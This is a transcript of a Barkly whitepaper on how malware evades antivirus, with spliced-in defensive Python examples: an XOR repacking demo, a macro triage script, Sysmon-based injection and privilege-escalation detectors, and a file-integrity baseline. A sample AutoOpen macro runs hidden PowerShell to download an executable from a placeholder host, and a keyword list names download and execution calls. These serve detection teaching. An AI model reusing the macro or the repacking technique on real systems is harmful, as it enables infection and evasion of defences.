How Malware Sneaks Past Antivirus

Upload: barkly

Post on 21-Jan-2017


TRANSCRIPT

© 2016 Barkly Protects, Inc. All rights reserved

How Malware Sneaks Past Antivirus 2

Spending on IT security continues to rise, with current estimates projecting it to reach $170 billion by 2020 [1]. Despite all that spending, malware continues to be a big problem. Whether your own budget is growing year-to-year or not, chances are you’re still looking for something that’s actually going to stop attacks and lower your risk.

You’re not alone. Nearly 9 in 10 security professionals are planning on either replacing or augmenting their antivirus solutions [2]. And until they do, they’re operating under the assumption that what they currently have isn’t enough: at any moment, criminals can bypass their security.

[1] Cybersecurity Market Report, Cybersecurity Ventures: http://cybersecurityventures.com/cybersecurity-market-report/

[2] 2016 Cyberthreat Defense Report, CyberEdge Group: https://www.invincea.com/2016/03/cyberedge-group-2016-cyberthreat-defense-report/

Why is it that attacks are still getting through defenses?

To answer that question you need to understand how today’s modern malware works. Let’s look at some of the ways it breaks into systems that are defended with antivirus, and the sneaky things it does once it’s there.


It wears clever disguises.

Most antivirus products still lean on signature matching: they look for byte patterns or file hashes they have seen before. To avoid getting caught, attackers run the malware through a cryptor, packer or obfuscator that encodes or rewrites it, so the bytes on disk no longer match any known signature even though the behaviour is identical. It’s like putting on a new outfit. The real payload is only decoded in memory when the file runs, which is why a scan of the file alone can miss it.
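Here is an added example (not from the Barkly document) of what the disguise does to a file scanner. The payload, the signature string and the stub layout are made up for the illustration, and the "cryptor" is a repeating-key XOR rather than anything a real packer uses:

```python
# Added example, not part of the Barkly document: a static byte signature and a
# file hash both stop matching after a trivial encoding pass, even though the
# payload that runs is unchanged. PAYLOAD, SIGNATURE and the stub format are
# constructed for this illustration; the "cryptor" is a repeating-key XOR.
import hashlib

PAYLOAD = b"BEGIN cmd.exe /c powershell -enc SQBFAFgA... END"  # constructed stand-in for malicious code
SIGNATURE = b"powershell -enc"                                   # byte pattern a signature engine might carry
STUB_PREFIX = b"STUB:xor4:"                                      # constant decoder "stub" in front of the blob
KEY_LEN = 4


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def signature_matches(data: bytes, signature: bytes = SIGNATURE) -> bool:
    """Static check: does the known byte pattern occur anywhere in the sample?"""
    return signature in data


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. Applying it twice with the same key restores the input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_dropper(payload: bytes, key: bytes) -> bytes:
    """What a cryptor ships: a small constant stub (prefix + key) followed by the
    encoded payload. Rebuilding with a new key yields a new file hash every time."""
    if len(key) != KEY_LEN or 0 in key:
        # a zero key byte would leave that position of the plaintext visible
        raise ValueError("key must be %d non-zero bytes" % KEY_LEN)
    return STUB_PREFIX + key + xor_bytes(payload, key)


def run_stub(dropper: bytes) -> bytes:
    """What the stub does at run time: read the key and decode the payload in memory.
    Only this decoded form would match the signature, and it never touches disk."""
    if not dropper.startswith(STUB_PREFIX):
        raise ValueError("not a dropper built by build_dropper")
    body = dropper[len(STUB_PREFIX):]
    key, encoded = body[:KEY_LEN], body[KEY_LEN:]
    return xor_bytes(encoded, key)


def compare(key: bytes) -> dict:
    """Summarise what a file scanner sees before and after the 'disguise'."""
    dropper = build_dropper(PAYLOAD, key)
    return {
        "payload_hash": sha256_hex(PAYLOAD),
        "dropper_hash": sha256_hex(dropper),
        "signature_hits_payload": signature_matches(PAYLOAD),
        "signature_hits_dropper": signature_matches(dropper),
        # the constant decoder is the part worth signing instead of the payload
        "signature_hits_stub_prefix": signature_matches(dropper, STUB_PREFIX),
        "decoded_equals_payload": run_stub(dropper) == PAYLOAD,
    }


if __name__ == "__main__":
    for name, value in compare(b"\x5a\xa5\x3c\xc3").items():
        print(f"{name}: {value}")
```

Two things to notice when you run it: every rebuild with a fresh key produces a different hash, so hash blocklists lag by construction, and the only thing that stays constant from build to build is the decoder stub, which is why defenders sign the stub or watch what the decoded code does rather than the bytes on disk.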


It sneaks into Microsoft Office files as a macro.

Microsoft Office macros are helpful for automating common tasks, but they can also be used as a vehicle by attackers. A macro placed in an auto-execute entry point (for example AutoOpen or Document_Open in Word, Workbook_Open in Excel) runs as soon as the document is opened, provided macros are enabled, whether by the user clicking "Enable Content" or by policy. From there the macro can download and run additional malware without any further click.
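As an added example (not code from the Barkly document), the following triage script flags the two things that make a macro dangerous on open: an auto-execute procedure name and a call that runs or downloads something. The two macro samples are constructed for the illustration, and the keyword lists are a deliberately small heuristic, not a complete detector:

```python
# Added example, not part of the Barkly document: a triage pass over the VBA source
# of an Office macro. Both samples are constructed; the URL is a placeholder.
import re
from typing import Dict, List

SAMPLE_VBA = r'''
Sub AutoOpen()
    Dim sh As Object
    Set sh = CreateObject("WScript.Shell")
    sh.Run "powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/a.exe','%TEMP%\a.exe')", 0
End Sub

Private Sub Document_Close()
    ' harmless cleanup
End Sub
'''

BENIGN_VBA = r'''
Sub FormatReport()
    Range("A1:E8").Font.Bold = True
End Sub
'''

# Procedure names Office runs automatically when a document is opened or closed,
# provided macros are enabled (by the user clicking "Enable Content" or by policy).
AUTO_EXEC = ("AutoOpen", "Document_Open", "Workbook_Open", "Auto_Open",
             "AutoClose", "Document_Close", "Workbook_Close", "AutoExec")

# Calls a macro uses to run code or fetch a second stage. Plain substring matching,
# so this is a triage heuristic, not a parser of VBA.
SUSPICIOUS_CALLS = ("Shell", "WScript.Shell", "CreateObject", "URLDownloadToFile",
                    "XMLHTTP", "WebClient", "powershell", "cmd.exe")

# Matches 'Sub Name' / 'Function Name', with an optional Public/Private in front.
PROC_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)", re.I | re.M)


def find_auto_exec(vba: str) -> List[str]:
    """Names of declared procedures that Office would run on open/close."""
    wanted = {n.lower() for n in AUTO_EXEC}
    return [name for name in PROC_RE.findall(vba) if name.lower() in wanted]


def find_suspicious_calls(vba: str) -> List[str]:
    """Keywords that indicate the macro executes or downloads something."""
    lowered = vba.lower()
    return [c for c in SUSPICIOUS_CALLS if c.lower() in lowered]


def triage(vba: str) -> Dict[str, object]:
    auto = find_auto_exec(vba)
    calls = find_suspicious_calls(vba)
    # Auto-exec plus an execution/download primitive is the "downloads and runs
    # something as soon as you open it" case the text describes.
    verdict = "high" if auto and calls else ("review" if auto or calls else "low")
    return {"auto_exec": auto, "suspicious_calls": calls, "verdict": verdict}


if __name__ == "__main__":
    print("phishing document:", triage(SAMPLE_VBA))
    print("report macro:     ", triage(BENIGN_VBA))
```

For real documents the VBA source has to be pulled out of the OLE or OOXML container first; the heuristic is the same once you have the text.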



It hides inside your favorite programs.

Malware likes to take advantage of popular programs, like browsers or document readers, because running inside them lets it use all of their access, network connections and resources without you noticing. It uses a technique called process injection: it opens a running process, writes its own code into that process’s memory and starts a thread to run it, adding the functionality it needs to attack while the process still looks like the trusted program.


Once it’s there...


It launches a coup for system admin privileges.

Power-hungry malware attempts to gain administrator or SYSTEM privileges on your system. It does this by exploiting flaws in the operating system kernel or in privileged services, or by abusing weaknesses in the controls, such as User Account Control, that are supposed to decide who may run with elevated rights. Once elevated, it can reach data and systems the original user could not.
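The two behaviours above, process injection and a jump to SYSTEM privileges, are what a behavioural engine watches for. The following added example (not Barkly’s code) runs two checks over a constructed stream of Sysmon-style events. It uses Sysmon’s field names and the Win32 process-access rights, but the log lines, paths and thresholds are made up and simplified for the illustration:

```python
# Added example, not part of the Barkly document: behavioural checks over a constructed
# stream of Sysmon-style events. Field names (EventID, SourceImage, TargetImage,
# GrantedAccess, IntegrityLevel, ...) follow Sysmon; the log lines, paths and user
# names are made up for this illustration, and the rules are simplified heuristics.
import re
from typing import Dict, Iterator, List

# Process access rights from the Win32 API, as they appear in Sysmon's GrantedAccess.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Constructed log: an attachment (invoice.exe) injects into the browser, then spawns a
# SYSTEM shell directly from its Medium-integrity context.
LOG = r"""
EventID=1 ProcessId=1204 Image=C:\Windows\explorer.exe ParentProcessId=1100 ParentImage=C:\Windows\System32\userinit.exe IntegrityLevel=Medium User=CORP\alice
EventID=1 ProcessId=5080 Image=C:\Users\alice\AppData\Local\Temp\invoice.exe ParentProcessId=1204 ParentImage=C:\Windows\explorer.exe IntegrityLevel=Medium User=CORP\alice
EventID=1 ProcessId=3320 Image=C:\Windows\System32\svchost.exe ParentProcessId=720 ParentImage=C:\Windows\System32\services.exe IntegrityLevel=System User=NT AUTHORITY\SYSTEM
EventID=10 SourceImage=C:\Windows\System32\csrss.exe TargetImage=C:\Program Files\Mozilla Firefox\firefox.exe GrantedAccess=0x1400
EventID=10 SourceImage=C:\Users\alice\AppData\Local\Temp\invoice.exe TargetImage=C:\Program Files\Mozilla Firefox\firefox.exe GrantedAccess=0x143A
EventID=8 SourceImage=C:\Users\alice\AppData\Local\Temp\invoice.exe TargetImage=C:\Program Files\Mozilla Firefox\firefox.exe StartFunction=LoadLibraryW
EventID=1 ProcessId=6100 Image=C:\Windows\System32\cmd.exe ParentProcessId=5080 ParentImage=C:\Users\alice\AppData\Local\Temp\invoice.exe IntegrityLevel=System User=NT AUTHORITY\SYSTEM
EventID=1 ProcessId=6200 Image=C:\Windows\System32\cmd.exe ParentProcessId=1204 ParentImage=C:\Windows\explorer.exe IntegrityLevel=High User=CORP\alice
"""

# key=value pairs; a value runs until the next " key=" so paths with spaces survive.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")


def parse_events(text: str) -> Iterator[Dict[str, str]]:
    """One event per non-empty line."""
    for line in text.strip().splitlines():
        if line.strip():
            yield dict(FIELD_RE.findall(line))


def detect_injection(events: List[Dict[str, str]]) -> List[str]:
    """Event 10: a handle opened with the rights needed to write code and start a thread
    in another process. Event 8: a thread actually started in another process."""
    findings = []
    for e in events:
        src, tgt = e.get("SourceImage"), e.get("TargetImage")
        if e["EventID"] == "10" and src != tgt:
            access = int(e["GrantedAccess"], 16)
            if access & INJECT_MASK == INJECT_MASK:
                findings.append(f"inject-capable handle {src} -> {tgt} ({e['GrantedAccess']})")
        elif e["EventID"] == "8" and src != tgt:
            findings.append(f"remote thread {src} -> {tgt} start={e.get('StartFunction', '?')}")
    return findings


def detect_system_spawn(events: List[Dict[str, str]]) -> List[str]:
    """Event 1: a SYSTEM-integrity child whose parent ran at Medium/Low integrity in a
    user's session. Legitimate SYSTEM processes descend from services.exe or other
    SYSTEM processes, and a UAC elevation yields High, not System.
    Simplification: PIDs are assumed not to be reused within the stream."""
    integrity: Dict[str, str] = {}
    findings = []
    for e in events:
        if e["EventID"] != "1":
            continue
        integrity[e["ProcessId"]] = e["IntegrityLevel"]
        parent_level = integrity.get(e["ParentProcessId"])
        if e["IntegrityLevel"] == "System" and parent_level in ("Medium", "Low"):
            findings.append(f"SYSTEM child {e['Image']} spawned by {parent_level} parent {e['ParentImage']}")
    return findings


if __name__ == "__main__":
    evts = list(parse_events(LOG))
    for f in detect_injection(evts) + detect_system_spawn(evts):
        print(f)
```

The csrss.exe access (0x1400, query rights only) and the High-integrity cmd.exe under explorer.exe (a normal UAC elevation) are deliberately present so the rules have something benign to ignore; none of the matching depends on the attachment’s hash or name.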



It uses handy tools to steal your passwords.

Malware uses special tools, like keyloggers and credential stealers, to get the keys to the systems you have access to. A keylogger records what you type, passwords included; a credential stealer reads saved passwords and cached credentials from browsers, password stores and the operating system. With your passwords in hand, attackers can log in to any system you can, so the compromise spreads well beyond the infected machine.



It looks around for unsuspecting files to invade.

Some malware scans every file on your hard drive looking for programs it can infect, then overwrites or prepends as many of them as it can with its own executable code. The programs still appear to work, but when you open one of them, the malicious code runs first.
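One practical check against this kind of infection is a hash baseline of every executable, taken when the machine is known clean and compared later. The following is an added example (not from the Barkly document): it builds a handful of toy program files in a temporary directory, simulates a prepending infector on them with an inert marker, and reports what changed:

```python
# Added example, not part of the Barkly document: catching file infection with a hash
# baseline. The programs, their contents and the inert "stub" are all constructed here
# inside a temporary directory; nothing outside it is touched.
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

EXECUTABLE_PATTERNS = ("*.exe", "*.dll")


def sha256_file(path: Path) -> str:
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: Path, patterns: Tuple[str, ...] = EXECUTABLE_PATTERNS) -> Dict[str, str]:
    """Relative path -> hash for every executable under root, taken when the system is known clean."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for pattern in patterns for p in sorted(root.rglob(pattern))}


def compare(root: Path, baseline: Dict[str, str]) -> Dict[str, List[str]]:
    """Re-hash now and report what changed since the baseline."""
    current = build_baseline(root)
    return {
        "modified": sorted(k for k in baseline if k in current and current[k] != baseline[k]),
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
    }


def simulate_prepender(root: Path, stub: bytes) -> List[str]:
    """Stand-in for the behaviour described above: walk the tree and put a 'malicious'
    stub in front of every program so the stub would run first. Here the stub is an
    inert marker and the files are this example's own fixtures."""
    touched = []
    for p in sorted(root.rglob("*.exe")):
        original = p.read_bytes()
        if not original.startswith(stub):  # don't re-infect
            p.write_bytes(stub + original)
            touched.append(p.relative_to(root).as_posix())
    return touched


def demo() -> Dict[str, List[str]]:
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        # toy stand-ins for PE files: "MZ" header, padding, a body
        (root / "bin" / "editor.exe").write_bytes(b"MZ" + b"\0" * 62 + b"editor body")
        (root / "bin" / "viewer.exe").write_bytes(b"MZ" + b"\0" * 62 + b"viewer body")
        (root / "bin" / "helper.dll").write_bytes(b"MZ" + b"\0" * 62 + b"helper body")
        (root / "readme.txt").write_bytes(b"not a program")
        baseline = build_baseline(root)
        infected = simulate_prepender(root, b"STUB:inert-marker;")
        report = compare(root, baseline)
        report["infected"] = infected
        return report


if __name__ == "__main__":
    for key, paths in demo().items():
        print(f"{key}: {paths}")
```

The baseline has to be stored somewhere the malware cannot rewrite, otherwise an infector that updates the manifest after itself defeats the check; on a real system that is the role of a signed manifest or a remote integrity service.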


Barkly™ sees all of these malicious maneuvers – and stops them automatically.

How does Barkly stop malware that gets past antivirus?

By taking an entirely different approach to identifying malware. Instead of relying on signature-matching, Barkly watches system processes for signs of malicious activity, then it stops that activity before the malware can do any harm.

That means unlike antivirus solutions, which can be thrown off by new or disguised malware they don’t recognize, Barkly can even stop new, never-before-seen malware, simply by watching its behavior and stopping it when it tries to do something it shouldn’t.

See How Barkly Works
